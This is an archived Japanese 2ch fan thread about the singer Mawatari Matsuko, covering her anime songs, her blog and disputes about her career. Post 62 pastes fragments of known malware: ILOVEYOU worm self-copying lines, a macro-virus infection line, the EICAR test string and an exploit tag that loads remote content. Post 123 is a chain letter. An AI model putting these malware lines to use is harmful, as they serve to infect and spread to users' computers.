【ディーバ】馬渡松子【健在】 (348) TOP カテ一覧 スレ一覧 2ch元 削除依頼
JYONGRI Part 7 〜 Maybe Someday〜 (698)
【もう少し】竹井詩織里◆PART12【信じたい】 (596)
【みく】 未来 【アーティストとしての石田未来】 (142)
【永ちゃんの】矢沢洋子【娘】 (139)
【2ndアルバム】高杉さと美 Part.5【Prism発売中】 (651)
【大躍進間近】May J.【無敗のカラオケ女王】Part.3 (321)

【ディーバ】馬渡松子【健在】


1 :2005/11/28 〜 最終レス :2013/10/25
馬渡松子 - OFFICIAL SITE - OPEN SALOON
http://www.opensaloon.net/
馬渡松子 New Album「POPS+」
2005年12月17日発売決定 !! 予約受付中 !!
http://www.webworks-jp.com/MAWATARI/

2 :
とりあえず2ゲット

3 :
3ゲッツ!
みんな思い出せ!
幽白の、ほら!あの人だよ!

4 :
ありがとうござい…マス!

5 :
やぱーり昔の方がいいよ

6 :
早速このスレもさよならbyebyeしそうだな

7 :
いやいや、ホームワークは終わらんよ。(すまん、無理あった)

8 :
幽白の4曲しか知らないんだけども

9 :
さよならバイバイだけ今でも聴ける感じ

10 :
さよならbyebyeは神

11 :
昔は良かった

12 :
>>11
・・・ハゲド

13 :
昔は…、って、今を聴いてないくせに。

14 :
確かに今の曲はセルフカバーの「微笑みの爆弾」しか聴いたことない

15 :
アニソン歌ってる人のなかでも歌唱力は
上の方に位置するんじゃないか?
この人のビブラートは好みだな

16 :
歌は上手いよね。

17 :
嫌われ松子の一生

18 :
最初ドリカムかと思った。
そういや幽白の主題歌の人亡くなっちゃったね。ご冥福をお祈りします。

19 :
この人の曲は90年代の臭いがする。新作も。

20 :
だがそれがいい

21 :
いたねー、こんな人。
ドリカムに関係していたような。。。

22 :
さよならbyebyeの
最初の「吹っ切るはずの」の部分は神だと思うが。。

23 :
そこだけかよwwww

24 :
声は最高なんだが、曲が、いいと思えん。。

25 :
>>24

26 :
>>24かちかちかち

27 :
age

28 :
まだいたんだ

29 :
>>18
高橋ひろだよね?御冥福をお祈り致します。

30 :
P−U。

31 :
この人のCDはなぜか音が良い!
好きなアーティストがキングクリムゾンって・・・すごいね。

32 :
リーシャウロンって誰?

33 :
旦那

34 :
>>33
え?マジ?

35 :
まじで?

36 :
三股出身だっけ?
近くだにゃ。
幽白のCD借りてたくさん聴いたなぁ。

37 :
この人ドリカムのこと嫌いなの?
HP見てなんかそう感じたのだけど
何かあった?

38 :
>37
そうなの?
昔、ドリカムのバックコーラスやってたんだよね?この人。

39 :
>>34-35
いや、本当に。

40 :
作詞に小田佳奈子、牧穂エミ、松井五郎を向かえて欲しかった。

41 :
コエンマのデイドリームジェネレーションはネ申なり。

42 :
誰か〜Mステのデイドリームジェネレーションうpしてくださいませんか?

43 :
>>22
あ、それすごいわかる

44 :
http://www.youtube.com/watch?v=kUbnQ0e-GdY&search=mawatari

45 :
あげ。

46 :
デイドリームジェネレーションはよく聴いたなぁ・・・

47 :
メチャメチャ厳しい人がふいに見せた優しさのおかげで
このスレがageられましたよ皆さん!

48 :
>>47
アリガトウゴザイーーーーー   マス!!!

49 :
街の人ごみ肩がぶつかって独りぼっち→○
果てない草原風がびゅびゅんと・・独りぼっち→△
従業員150人の職場で独りぼっち→◎

50 :
ほんっといい声してるよね。大好きだわまじ。

51 :
age

52 :
サイトがリニューアルされる前に、バイオグラフィのページに
『口はわざわいの元…』とかって書いてたような気がするんだが、
'96〜'97年頃に何やらかしたんだ?
未だに仕事を干されて宮崎に帰った理由がよく分からんのだが。
メディアレモラス解散する時に何かあったの?
当時のコト詳しい人教えて下さいです…

53 :
>>52
'96〜'97年よりは前だと思うけど
ドリカムのバックやってたときは
ソロになるのもあったのだろうが
中村さんと合わなかったという話は聞いたことがある
吉田さんにもあまり良い印象は持ってなかったとか・・
あくまで噂だけど・・
プロフィールでもドリカムのこと少々おちゃらけて書いているし
(悪意があるのかないのかは別として)
帰郷したのは病気のためとかってあったけど・・
芯が強そうで裏表がなさそうだから
ぶつかりやすいかもしれないよね
そういうところ好きなんだけどね
的確な答えじゃなくてごめんね

54 :
>>53さん
ありがとう!+亀レススマソ。
そうだそうだ「病気した」ってのをすっかり忘れてました。

55 :
age

56 :
ほしゅ

57 :
この人昔ラジオで、自分のパイオツ吸った事あるって言ってた

58 :
>>38
ドリカムのring ring ring だっけか?
にコーラス参加してたはず。
自分は、題名うろ覚えだから違うかもしれないけど、
フォーチュンテラーって曲が好きだったぞ。
♪Mrフォーチュンテラーこの先どうなるの? ってやつ
知ってる人いるかしら?

59 :
>>58
ノシ
あ・い・た・し・が・く・な・り・が・た・し!

60 :
うはー、懐かし
つられて、心臓破り も思い出した

61 :
"君は今心臓破り"を聞くと90年代前半を思い出して涙がちょちょぎれます^^

62 :
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)

63 :
あげ

64 :
>そういえば、この間、なにげなく前にやった代々木のライブパンフを見てたら、
>代表の白川さんって馬渡松子さんに詞を提供していたリーシャウロンっていう人だったのね。
>うわっ、そんな有名人に声かけられてしまったんだ、極楽(CONY)ってスゲェー。
某ブログより。
有名人なんだね。

65 :


66 :


67 :


68 :
Mステ(デイドリームジェネレーション)
http://www.youtube.com/watch?v=EpG42xBWY4Y

69 :
kokowadbk

70 :


71 :
http://www.youtube.com/watch?v=75KiNTSB8-s
吹っ切るはずの

72 :
最近友達がカラオケで幽遊白書の「微笑みの爆弾」歌って、いい曲だな〜と思って、ネットで幽白の曲拾って聞き始めた。
ハマった。女だが歌声に恋した。
この人の事全然知らなくて、ググッたら最近の写真見つけたけど…orz
微笑みの爆弾は神すぎる。当時は消防でわかんなかったけど。
上のMステ、やっぱり声素敵ダナ〜。

73 :


74 :


75 :


76 :


77 :


78 :
さよならbeybeyは神曲
ツタヤで幽吐くのアルバム借り手きたお( ^ω^)

79 :
ちくしょう

80 :


81 :
馬渡さん懐かしい。
大好きだったなぁ。
1stアルバムは全部良かった。また聞きたい〜。

82 :
あ・り・が・と・ご・ざ・い〜ま・す!!!

83 :


84 :
馬渡さん復活して〜

85 :
a

86 :
>>84
復活してもなにも引退も何もしてませんが

87 :
昔、テレビで2・3回歌ってるところを見たけど
すごかったなぁ。
踊りが!!!!

何かいっちゃってそうなすごく変な踊りをしていて
突然カメラに突っ込んじゃったり
お客は完全にひいてたけど
そんな松子ネエが好きさ。

88 :
馬渡はジャニオタを敵に回したな。

89 :
なぜ!?

90 :
ここは誰もいないなぁ。
馬渡さんってあんまり有名じゃないのかな。

91 :
"知らん顔"
が関東ローカル局群(千葉、埼玉、神奈川)同時放映の『ハマランチョ』って番組で使われてる!!

92 :
嫌われ松子の一生

93 :
関連wiki
http://wiki.ninki.org/wiki.cgi?p=%a1%da%a5%c7%a5%a3%a1%bc%a5%d0%a1%db%c7%cf%c5%cf%be%be%bb%d2%a1%da%b7%f2%ba%df%a1%db

94 :
今幽遊白書の再放送やってるけど、この人の声いいね☆

95 :
YouTubeのMステ動画消えてる・・・。
どなたか動画お持ちの方、アップして頂けないでしょうか。

96 :
あ り が と う ご ざ い……………マス!!

97 :
は〜

98 :
昨日の堂本兄弟でさよならByebyeがランクインしてた

99 :
吹っ切るはずの心に〜♪

100 :
あげ

101 :
馬渡さんのブログ!
http://open.saloon.jp/

102 :
目を開ーけてー見る夢ーならー
今はー傷ついてもいいー

103 :
 

104 :
ブログ更新キタヨキタヨ!

105 :
>>101
お気に入り登録した

106 :
この空がーかってなほどーすなおになれるよーー∀

107 :
この人のスレがあったんだ。
つい最近、幽白のアルバム借りてきたがやっぱりいい歌だ(`・ω・´)
ホームワーク〜の歌の途中にあるラップ?には「え?」ってなったが。

108 :
保守

109 :
幽白のCDは毎日のように聴いてる。
ホームワーク〜の前奏がかっこいい!
カラオケで歌ったら、すぐ友達にトイレに立たれたけど


110 :
バラブシュカは神アルバム

111 :
神だなんて…好きになるにも程がありますよ!

蒼い〜夜明けの歩道〜

112 :
えぇい、貼ってしまえ!!
http://www.youtube.com/watch?v=288r2bj5ZqY

113 :
ってかバラブシュカ以前のアルバムって廃盤なんだ・・・
一枚目以外は持ってるんだけどね
個人的には三枚目が好き

114 :
最近思い出してよく聴いてる
それにしても良い声だな
もう一花、いや二花も三花も咲かせてくれ

115 :
>>113
3枚めはほんわかした曲が多くて良いやね

116 :
松子愛してるぜ松子

117 :
サノバガ〜〜〜んw

118 :


119 :


120 :
アリアリアリ
アリーデベルチ

121 :
さよならByeByeは俺の中で神いわゆるゴッドな曲に認定された

122 :
>>121はルー大柴

123 :
これはアメリカのゲームです。1度やってみてください。
これは、たった3分でできるゲームです。試してみてください。
驚く結果をご覧いただけます。
このゲームを考えた本人は、メールを読んでからたった10分で願い事が
かなったそうです。このゲームは、おもしろく、かつ、あっと驚く結果を
貴方にもたらすでしょう。
約束してください。絶対に先を読まず、1行ずつ進む事。
たった3分ですから、ためす価値ありです。

まず、ペンと、紙をご用意下さい。
先を読むと、願い事が叶わなくなります。

@まず、1番から、11番まで、縦に数字を書いてください。
A1番と2番の横に好きな3〜7の数字をそれぞれお書き下さい。
B3番と7番の横に知っている人の名前をお書き下さい。(必ず、興味の
ある性別名前を書く事。男なら女の人、女なら男の人、ゲイなら同姓の名
前をかく)
必ず、1行ずつ進んでください。先を読むと、なにもかもなくなります。
C4,5,6番の横それぞれに、自分の知っている人の名前をお書き下さ
い。これは、家族の人でも知り合いや、友人、誰でも結構です。
まだ、先を見てはいけませんよ!!
D8、9、10、11番の横に、歌のタイトルをお書き下さい。
E最後にお願い事をして下さい。さて、ゲームの解説です。
1)このゲームの事を、2番に書いた数字の人に伝えて下さい。
2)3番に書いた人は貴方の愛する人です。
3)7番に書いた人は、好きだけれど叶わぬ恋の相手です。
4)4番に書いた人は、貴方がとても大切に思う人です。
5)5番に書いた人は、貴方の事をとても良く理解してくれる相手です。
6)6番に書いた人は、貴方に幸運をもたらしてくれる人です。
7)8番に書いた歌は、3番に書いた人を表す歌。
8)9番に書いた歌は、7番に書いた人を表す歌。
9)10番に書いた歌は、貴方の心の中を表す歌。
10)そして、11番に書いた歌は、貴方の人生を表す歌です。
この書き込みを読んでから、1時間以内に10個の掲示板にこの書き込みをコピーして貼って下さい。そうすれば、あなたの願い事は叶うでしょう。もし、貼らなければ、願い事を逆のことが起こるでしょう。とても奇妙ですが当たってませんか?

124 :
安倍だよね。安部じゃないよね。

125 :
阿部だろ

126 :


127 :
チェ・チェ・チェ・・・

128 :
あげときます

129 :
あ、俺も俺も

130 :
え?

131 :


132 :
微笑みの爆弾買いました

133 :
ナツカシス 渋谷Take off7でのライブが・・・
ソロデビュー前だったよな。
あの頃から歌唱力は抜群だった。
そのライブのMCでDCTのTV出演でコーラスやった時に、
今回はすげ〜写ってるう〜!って、はしゃいでました・・・
俺を含めて客はほとんど引いてたけどね・・・あのテンションに・・・

134 :
sagesage

135 :
age

136 :


137 :
真のディーバと呼んでもいいのは、Minnieかこの人ぐらいだろう。

138 :
ウウウウウウウウウウウウウウウウウウウウウウウウウウウ
ウウウウウウウウウウウウウウゲッゲロゲ〜〜〜〜ウウウウウウウウウウウウウウウウウウウウウ
コケコッコ〜〜〜蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘
蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘
コケ〜〜〜zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzz
蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ
蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ
蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ
蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ
蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ
ウウウウウウウウウウウウウウウウウウウウウウウウウウウ
ウウウウウウウウウウウウウウゲッゲロゲ〜〜〜〜ウウウウウウウウウウウウウウウウウウウウウ
コケコッコ〜〜〜蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘
蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘蔘
コケ〜〜〜zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzz
蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ
蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ
蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ
蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ
蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ蔕ウ
コケコッコ〜〜〜〜〜ウウウウウウウウウウウウウウウウウウウウウ

139 :
初めてブログ読んだんだけどなんか病んでね?

140 :
>>139
ね。読者にいったい何を訴えているのか…。

141 :
俺もブログ見てきたが、確かに病んでるな…。
つーかベストアルバムが出るらしいじゃないか。
しかし数年前にセルフカバーされた微笑みの爆弾の
出来を考えると、少々不安…。

142 :
この人たしか幽白のことをあまりよく思ってないんだよな

143 :
桑原の姉貴が歌ってるのを想像してしまう
良い声だよな〜

144 :
静流さんと声かぶるよねw

145 :
20代でストイックに音楽つきつめてポップスとのせめぎあいして自由に生きてきたんだよ
あの音楽性でjames brawnのバンド組むなんてかなりやるわ

146 :
ブログ読むとなんかむかつくなこのババア

147 :
ありがとうございました!

148 :
ある意味、アーティストらしい人ではある。

149 :
アニソン歌う奴が叩かれる共通項を発見した
http://music8.2ch.net/test/read.cgi/karaok/1214690573/
オフ会写真
http://music8.2ch.net/test/read.cgi/karaok/1214690573/11

150 :
age

151 :
ようつべでMステに出た時の馬渡の動画ウォークマンで落とせる?

152 :
落とせる

153 :
sage

154 :
^^

155 :
今、ベストアルバムの試聴を聞いてきたんだが…
歌唱力落ちてる…?
というか、音程が外れてるように聞こえる箇所がいくつもあるんだけど
これはアコースティックverだからなんだろうか
今でも幽遊白書のCD聞くけど、昔の方が全然良いじゃねーかYO!

156 :
録り直したの?

157 :
あーこれ再録か残念だ

158 :
ブログ見ていて近い将来自殺しそうな勢いだな

159 :
なんか…自分もブログ見て「どうしたんだこの人…!」ってちとびっくりした
ブログ持ってるなんて知らなくて、最近初めて行ったんだが、
これ全然自分がミュージシャンだと自覚してる人間の書く文章じゃねーぞ!
そんなに周囲からの目がないと思っているんだろうか
こういう歌とか、自分そのものを売りにして生きる商売ってのは
普段の本人の素行なんかも、絶対気を付けなきゃいけないと思うんだよ
どうしたんだ松子…!
なんか「看板が無くて引き返せない」の所ですごく心配になった…
おま…もう自分の意志で引き返しちゃえばいいじゃねーか!
ギャグととれず、本気で大丈夫なのかと心配になるブログだよな…

160 :
とても好きなアーティストなんだが
ブログ読んでるとどうしたもんかと
>155
鍛え直せばまだまだいける
と思うのは贔屓の引き倒しなんだろうな……

161 :
^^

162 :
この人ブログに度々「私は業界から干されて〜」とか書いてるけど何があったんだろう?あまり売れなくて契約切られただけじゃないのかなあ?

163 :
もうちょいストイックに頑張って欲しいな
老け込むにはまだ早いよ松子さん
喉大切にしてダイエットすりゃあの美声も復活するだろうに…勿体無い

164 :
タバコで咳き込みだしたらもう断煙しなきゃ
体調についても酒やめなきゃ
このままだと本当に歌えなくなるよ
日本に数少ない本物の実力者なんだから、
体も才能も大事にしてほしいと切に願っている

165 :
人生色々あると思うけど、この方いつからこんな感じなんだろうか…
ネガティブな事ばかり口にしてると、益々自己暗示でネガティブに行ってしまうし
その辺はマインドコントロールする努力くらいするべきだと思うけどなぁ
音楽以前の問題で。
このブログ読んだら(例えば仕事関係の人とか)、
とても馬渡さんを大人として扱ってくれるとは思えないんだが。
コメントを付けてるファンの人らは優しいから暖かい言葉をかけてるけど
それに甘えてないか??
周りが自分の都合の良いように合わせてくれるなんて思ったら大間違いだぞ。
誰だって嫌な事なんて山ほどあるのに名前のせいにするなよと。
全国の松子さんに失礼すぎる。
曲はすごく好きなんだけどさ…

166 :
マワさん最強!マワさん最高!
昼さが〜り〜渡り廊下〜すれ違う度〜

167 :
さよならbyebyeと
デイドリームジェネレーション
好き過ぎて今でもiPodに入れて聞いてる自分は幽白世代です。

168 :
過疎ってるなぁ…。
自分も幽白でハマって松子さんのアルバム全部揃えた。
今でもケータイに落として聞いてるよ。
パンチのある歌声だったんだけどなぁ…。

169 :
itano

170 :
おいおい、この人まだ40代じゃないか。
67年生まれの声優っていったら今もまだ大活躍してる。馬渡さんは歌手だけど…
頑張ってほしい。馬渡さんの歌声大好きだよ

171 :
たまにブログにコメ書いてるけど片思い的気分になる…
ライブできない程体調悪いんですかね?

172 :
>>171
馬渡の大ファンで大好きだから敢えて言わせてもらう。
この人の今の外見は化け物。クリーチャー。
全盛期ですら容姿はよくないのに、自己管理(喉も含む)を怠ればなおの事。
ライブなんかできるわきゃない。
ラジオでアルバム製作中と言ってたよ。期待しよう!

173 :
そんなに酷いん?
確かに幽白のセルフカバー聞いた時は驚いたが昔のアルバム聞いたら
すごい人なんだと実感したよ。素晴らしい曲ばかりで
廃盤になってるけどオクで落として聴くの楽しみだ
松子さん頑張れ〜

174 :
顔なんか見たことないが
外見は関係ないだろ。

175 :
ルックスは関係ないな
またいいアルバム出るよう期待するわ

176 :
酷いというほどでもない。歳相応よりちょっと老けた普通のおばさんって感じ。

177 :
マワワンがんばれ〜!

178 :
ブログに書いてあるド○○○にワロタw
なにゆえ伏字?w

179 :
>>174
同意。
しかし外見から推察される本人の自己管理状況というものがありまして。
ストイックに生きて欲しい。
二流の表現者いたいと思うなら尚のこと。存在がダレてるとファンとして寂しい。

180 :
>>178たしかにw
私はド〇〇〇嫌いだからコメで突っ込もうかと思ったw
ド〇〇〇のバック出身で売れた人いるの?

181 :
なぜか松子さんの外見が静流さんで脳内再生されるんだが。
理由わかる人いる?

182 :
>>181
「さよならbyebye」のイメージ?

183 :
ただのアニオタ

184 :
>>162
答えはリーシャウロン氏が開いているホームページ内コラムの
タイトル「圧力」を読めば解る!

185 :
マツコデラックスのスレはここですか?

186 :
>>181
声がなんとなく似てるからじゃないかな?
静流さんが歌ったらこんな感じだと思う
幽遊白書がきっかけで好きになった歌手だけど、
本人がそのことをあまりよろしくなく思ってるようで驚いた
今ではアニメの主題歌やEDを一般歌手が歌うなんて当たり前で
アニメをきっかけにブレイクする歌手も出てきたけど
当時としてはアニソンを歌うというのは喜ばしいことではなかったのかなぁ…

187 :
>>186
ブログには今は感謝しているようなことは、これまで何度も書かれている。
歌手ではなくアーティストになりたくてプロになったのに、
アニソンを歌うとそこに限定されてしまうイメージが付く懸念ぐらい、
計算できない人じゃないよ。
漫画は好きで、幽白のコミックも買ってたそうだし。
わざとらしい問題提起にしか見えない。


188 :
出身地一緒でびっくらこいた

189 :
     ____
   /__.))ノヽ
   .|ミ.l _  ._ i.)
  (^'ミ/.´・ .〈・ リ
  .しi   r、_) |  馬渡はわしが育てた
    |  `ニニ' /
   ノ `ー―i´

190 :
馬渡さんのボーカルは神
うまいとかじゃなくて色々なセンス
物まねしても到達できない


191 :
リーシャウロン氏のブログは素晴らしい
リー氏がいなかったらあれほどメジャーで活動できたかと思う

192 :
>>187
すげー
このカキコがわざとらしい問題提起にしか見えないて、どんだけ卑屈なんだw
むしろ187の主張の方がわざとらしく松子の良いところだけピックアップした文章に見えるが

193 :
>>192
なんでそんな大げさなんだwww

194 :
>>186
つくづくわざとらしいな
何回その話題を出すんだよw
歌手とアーティストの違いもわかんないんだな

195 :
再録バージョンの微笑みの爆弾、
見事にサビが「ねっちゃねちゃー」になってるよな。

196 :
久しぶりに来ましたが…なんだか一部の方に不快な思いをさせたようで申し訳ないです
わざと問題提起しようとしたとか、そんなのではなかったのですが
今までの書き込みや前スレを読んでなかったのも悪かったと思います。
幽遊白書の微笑みの爆弾が好きで、今でもちょくちょく聴いてます
再録バージョンが気になるので、今度聴いてみます〜

197 :
>>195
見事に「ねちねち」した性格だよな。

198 :
似てるよ
http://www.youtube.com/watch?v=yVh-RORu4Eo

199 :
馬渡

200 :
>>196
わざとらしくなく気になる訳ねw

201 :
数少ないファンがファンを蹴落とすようなマネして何がしたいんだ

202 :
2ちゃんを徘徊する外部の王ちゃまは何がしたいんだ

203 :
馬渡さんのCD持ってる
いつ聞いても良い

204 :
レコード会社って横沢がつぶしたんだよね
鈴木結女とか本当は歌手つづけたかったのかな?

205 :
今かつてのライヴ映像を自由に公開してるのは
リーシャウロンさんだけなん?

206 :
オープニング一曲でも歌えたんてうらやまし

207 :
今の馬渡氏の生活に不満はないが、過去の名作が埋もれるのは悲しい…
再発は無理なのか?

208 :
離婚したのかな

209 :
ブログにはダンナが側にいるのを匂わしてたけど妄想?

210 :
>>204
鈴木結女は結婚して米国に行ったから、
活動やめちゃったみたいだけど、いまは日本にいる。
彼女は都心の一等地に事務所あったけど、
急に板橋へ事務所移転してから活動が怪しくなった。
結婚も急な話で、FC解散で会費返金の権利あったのに
もらえなかったな。
松子姉御もデビューから好きで、CD全部保管中

211 :
メジャーだろうがインディーズだろうが生徒一人相手だろうが
フィルターは関係なくずっと音楽つくってるみたい
すぐに活動を政まつりごとに結びつけて
本人もファンもこうでなきゃと
筋をはきちがえたミュジシャンがいる中で
あるいみ本物の音楽家といえる

212 :
バラブシカなつかしす

213 :
インストアルバムって出来はいいの?
数少ない馬渡ファンも持ってないし
試聴も出来んし
インスト自体は好きなんだが

214 :
代表曲があるっていいなあ

215 :
支持者の数から入る→政治癖w

216 :
プラネタリウムのオファーで作ったインスト今でもたまに好きで聞く
馬渡さんは楽曲の強烈なファンがいまだ全国にいるから
やらないだけの話でもしライブ組んで告知したら
大きなハコは無理でも2DAYSは軽いんじゃなか?
ファンもインスト持ってないって何を根拠に断言してんだよ
諸々のHPやブログの様子で決めつける頭しかないネット厨が
自分の腕はどうなんだ

217 :
「数少ないファン」ってのが気にさわったなら反撃
ファンがいるならなぜ事務所クビになるんだよ
馬渡氏もブログに事務所の人に世話になった等々書いてた事あるか?
病気は理由にされちゃうかも知れんが
でも事務所の人も冷たくあしらったんだろ

218 :
クビになった云々を鵜呑みにしてるのか
情報入手はやはりブログだけなんだなネット厨
事務所は移籍レーベルを用意していた
どんなアーティストでも次はどうしていくかを常に考える
アットホームで有名な事務所だよ
商業的に売れることが必ずしもいいとは思ってなかった音楽への取り組み方と
意識のズレがあったので馬渡氏が独自で活動する決意をし
事務所もそれを了承したのがシステム上の流れだよ
そんなのが気にさわるというより
アルバム一枚さえきいたことのないファンでもない無知人間が
こんなところにわざわざネガティブ操作をしにくるバカさ加減にあきれるよ
そんなことする暇あるなら己の弦の甘さを反省しろ

219 :
>>218
同意
妄想ネットチュウは論点をすりかえたりで
他人をおとしめることに燃えてるだけってのがわかるな チセエ
こんなに業界に無知なやつも珍しいわwww
ヒーヒーいいながら一回こっきりのワンマンやるぐらいなら
余裕かましてやらない美学のがよっぽど神懸かって印象強いわwwwwwwwwwww

220 :
なぜかよく分からん流れになってるね
ライブハウス行きまくりだったファンの事も 叩く奴等しか残っておらんとは…
他のアーのファンはもっと優しいし、ましてや活動休止なら団結するよ
色々神経をうたがう…
はいはいアルバム6タイトル所有の新参者は消えま〜す

221 :
ふぁんなんかゼロでも音楽やっている人は山ほどいるのに
ふぁんや事務所をかならず結びつけて連呼・・・ちょっと異常
そんな次元から入るって
ねっとちゅうさんはちっちゃな事務所にかかわってる人かなんか?
インターネット止まりの
団結ってwwwどこまで政治癖なの
音楽の楽しみ方なんて個人個人自由なのに
動きばっか詮索するきつい性格のもんのために馬渡さんは音楽やってないよ
消えてくれてふぁんも助かる〜

222 :
ネット鼠はキャラ立ち先行の意識があるからじゃない?
馬渡さんはキャラも面白いけど
いまは作り出した音楽そのもののファンが占める
部屋で聴いたり個人で楽しむから情報表面上には浮かびづらい
あ わかった 音楽にはライブファンだけじゃなく
音源のみのファンもいるちゅうことが理解できないんだ
知ったかネガティブ操作でイメージダウンを図って
結局ファンを叩いてんのは自分自身ということまで揉み消すとは・・・


223 :
この場所で「復帰してして」言うつもりもないし意味もないだろうけど
馬渡松子の何かに関心持って書いてるんでしょ
憶測でも事実のおさらいでも別にいいが罵りあうのは寂しくないか…

224 :
MSの事はナガマリやドリカムとかに絡んで
言いつくされているんだけどねぇ…
女性歌手は長く活動している方は事務所を
かなり移動しているほうが多いんだよ。
MSも昔は小さく、小回り効く範囲で営業していたのが
ナガマリやドリカムの人気が大きく成り過ぎて
他の歌手まで手がまわらなくなって、ドリカムを
外へ出して分離独立させたし、ナガマリは無謀な結婚で
人気落ちて、切れる時に切った。
それでまた、適性規模の事務所に戻ったワケだが。
松子姫の場合はCD出す会社がきちんと宣伝出来なかったから
いい歌書いて歌っても売れなかった…と言うか「販売力」に
問題あるレーベルと組まされたのが不運だったと思う。
鈴木結女も同様だけど、アレもテイチクに移ってからは
新譜が全くCD店に入らなかったな。V-Japan→メディアレモラス組は
全員その後も悲惨だった。

225 :
純粋に曲が好きな者にとっては
数少ないファンと強調されたり憶測でクビと決めつけたり
事務所にあしらわれたんだろ なんてマイナスのよけいな言葉は
皆いい気がしないことはたしかだし
それを排除しようとするのは悪いことじゃなかろう
そもそも人の不幸は蜜の味みたいな人間は
実際都合が悪くなったら話そらしてるし
まともなディベートなんて成り立たないよ
>販売力に問題あるレーベルと組まされたのが不運
まさにその通りだが
馬渡姫にかぎっては悲惨というより どのような組まされ方をしても
自ら壊して同じ道をたどったかもね
根底にはどろどろパンクの血が流れてるし
売れるほどダサいことはないって爆弾発言してたしw
極論だし深い意味もあるんだろうけど
意識レベルの高いインデーズバンドの連中なんかは
この言葉の真意が理解できるかもしれん
レーベルがいいと思う基準と馬渡姫がいいと思う基準に
みぞがあったのはたしかだね

226 :
ちゃんと給料もらえるようなメジャーデビューしただけでも凄いことですよ。
出るのが難しいMステもMSの力で出れました。
業界は色んなことがあるから経緯も色々すぎて、
内部の話はもう興醒めしがちだけど、
バラブシュカや甘ちゃんが懐かしいから、たしかにここにいる。
いいことですよ。もうそれで十分じゃ・・・
もう何年も経ってる。15年以上?
それだけ経ってまだ話してる。これ凄いです。
馬渡さんは今はもうずっと個人で温和な生活送ってるのに、
ファンが団結だの、事務所がどうの、どうでもいいことに思えますが。
どれだけクオリティの高い曲を残したくれたかという。
爆発的に売れなかったほうが馬渡さんらしくてかっこいい。
少なくても、この世に生まれてこの才能に巡り合えた人は、
皆感謝してます。

227 :
公演を全くやらなくても、CDをお約束のペースで
出さなくても、聞いた人、見た人、それぞれの記憶に
残る存在であるから、それで十分じゃないかな…
業界には「1発屋」という、1曲のヒットのみで
次のヒットを出せるはずと思って「ドサ回り」で
生きている歌手も多数いる。ある歌手はそのヒット曲の
カバーが多数あるけど、自分の書いた曲でないから、
印税は入ってこないのだが、しぶとく生きている。
松子姫が損しているのは、その点だな。
他人がカバーする曲がない…

228 :
そのとおり
ん? 微笑みの爆弾は無名も含めてかれこれ10人ぐらいにカバーされてるよ?
しょこたんはオムニバスの中で歌ったけど
そのアルバムがオリコントップ10入りしてたらしいし
あと海外でもアニメの幽遊白書が始まって
馬渡姫の書いたOPEDが4曲まるまる放映されてきた
ブラジル、アルゼンチン、フィリピン、アメリカ、次はフランスとからしい
損どころか・・・20年近く経つのに馬渡姫はこの印税だけでも
莫大ではないとも思うが普通に生活できるだけの額が
相変わらず入ってきてる
アニソンのカラオケファンもやたら根強いからね
流行歌の大ヒット曲でも2、3年もしたら印税は0に近づくから
それを考えたらそうやって途切れずに何年も続くほうがよほどおいしい
さらに他の仕事も地元でやってるようだが
なんせ酒代が莫大のような気がw
豪勢じゃなくても一応印税生活できるってことは
さまざまなんらかの形で使用するのに必要とされてるってことだから
それだけ支持するユーザーもどこかで生まれてるってことだよね
やぱライブだけのことでファンを語るのはまちがいだ

229 :
自分もかなり年だけど 残念ながらジジババどもにはかなわんわ
っつーか最近急に湧いてきたよね 2ちゃんにファンブログな文章書く皆さんw


230 :
あ〜時間のある方はWikipediaの馬渡松子の項目を充実させてください
「多数」のファンやコミュでお願いしてもやってくださらないもので

231 :
馬渡さんは知らないところですごいんだなあ
そりゃ中途半端ガキがかなうわけないがなwww
デリカシーの文字さえ辞書にないわな
2チャンファンはwikiアカウント作って自分でやれってお願いしてもご無理なもので

232 :
